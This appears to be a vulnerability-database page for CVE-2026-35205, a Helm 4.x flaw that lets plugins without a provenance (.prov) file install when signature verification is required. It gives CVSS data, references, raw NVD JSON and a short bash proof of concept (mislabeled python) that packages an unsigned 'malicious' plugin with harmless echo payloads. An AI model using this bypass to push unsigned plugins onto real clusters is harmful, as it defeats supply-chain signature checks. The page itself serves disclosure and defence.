CVE-2026-35205

Description

Helm is a package manager for Charts for Kubernetes. From 4.0.0 to 4.1.3, Helm will install plugins missing provenance (.prov file) when signature verification is required. This vulnerability is fixed in 4.1.4.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:* - VULNERABLE

Helm >= 4.0.0, <= 4.1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-35205: Helm Plugin Signature Verification Bypass
# Description: Demonstrates installing a plugin without a .prov file.

# 1. Create a malicious plugin directory
mkdir -p malicious-helm-plugin
cd malicious-helm-plugin

# 2. Create a minimal plugin.yaml
cat > plugin.yaml <<EOF
name: poc-plugin
version: "1.0.0"
usage: "Malicious plugin"
command: "echo 'System Compromised'"
EOF

# 3. Create a dummy executable
echo '#!/bin/sh' > install.sh
echo 'echo "Installing malicious payload..."' >> install.sh
chmod +x install.sh

# 4. Intentionally omit the .prov file (plugin-name-1.0.0.prov)
# which is required for signature verification.

# 5. Package the plugin
tar czf ../malicious-helm-plugin.tar.gz .

echo "Plugin packaged without .prov file."
echo "On vulnerable versions, 'helm plugin install malicious-helm-plugin.tar.gz --verify' may succeed."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35205
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35205
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35205/
[4] VulDB https://vuldb.com/cve/CVE-2026-35205
[5] https://github.com/helm/helm/commit/05fa37973dc9e42b76e1d2883494c87174b6074f
[6] https://github.com/helm/helm/releases/tag/v4.1.4
[7] https://github.com/helm/helm/security/advisories/GHSA-q5jf-9vfq-h4h7
[8] https://helm.sh/docs/topics/provenance/#the-provenance-file

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35205", "sourceIdentifier": "[email protected]", "published": "2026-04-09T16:16:27.720", "lastModified": "2026-04-17T14:05:55.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Helm is a package manager for Charts for Kubernetes. From 4.0.0 to 4.1.3, Helm will install plugins missing provenance (.prov file) when signature verification is required. This vulnerability is fixed in 4.1.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-636"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.1.4", "matchCriteriaId": "800B9949-E36B-45F3-9EA0-CA9DDA3D8868"}]}]}], "references": [{"url": "https://github.com/helm/helm/commit/05fa37973dc9e42b76e1d2883494c87174b6074f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/helm/helm/releases/tag/v4.1.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/helm/helm/security/advisories/GHSA-q5jf-9vfq-h4h7", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}, {"url": "https://helm.sh/docs/topics/provenance/#the-provenance-file", "source": "[email protected]", "tags": ["Product"]}]}}